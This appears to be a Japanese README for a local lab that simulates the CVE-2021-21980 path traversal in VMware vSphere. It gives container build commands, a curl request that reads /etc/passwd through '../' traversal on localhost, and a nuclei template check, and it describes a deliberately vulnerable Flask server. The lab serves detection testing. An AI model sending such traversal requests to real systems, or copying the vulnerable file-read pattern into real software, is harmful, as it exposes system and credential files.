
CVE-2021-21980(VMware vSphere パストラバーサル)の現実的な脆弱性ラボ - モックサーバーではなく、実際のファイルエクスプロイト
VMware vSphere Web Client のパストラバーサル脆弱性をシミュレートする現実的なテスト環境です。
⚠️ 警告: 脆弱性テスト環境です。インターネットに公開しないでください!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ 実際にファイルを読み取ります Python のファイル I/O を使用してコンテナのファイルシステムから
✅ 現実的な動作 - 実際の vSphere のようにパストラバーサルを処理します
✅ VMware ヘッダー - Server: VMware-HTTP-Server/1.0 を含みます
✅ SSL/TLS - 自己署名証明書の生成
✅ ハードコードされていない - 実際のファイルの内容を返します
Dockerfile - コンテナビルド構成server.py - 脆弱性のある Flask アプリケーションCVE-2021-21980.yaml - Nuclei 検出テンプレートREADME.md - このファイルこのラボは Nuclei で検証され、以下が示されています:
podman stop vcenter-lab && podman rm vcenter-lab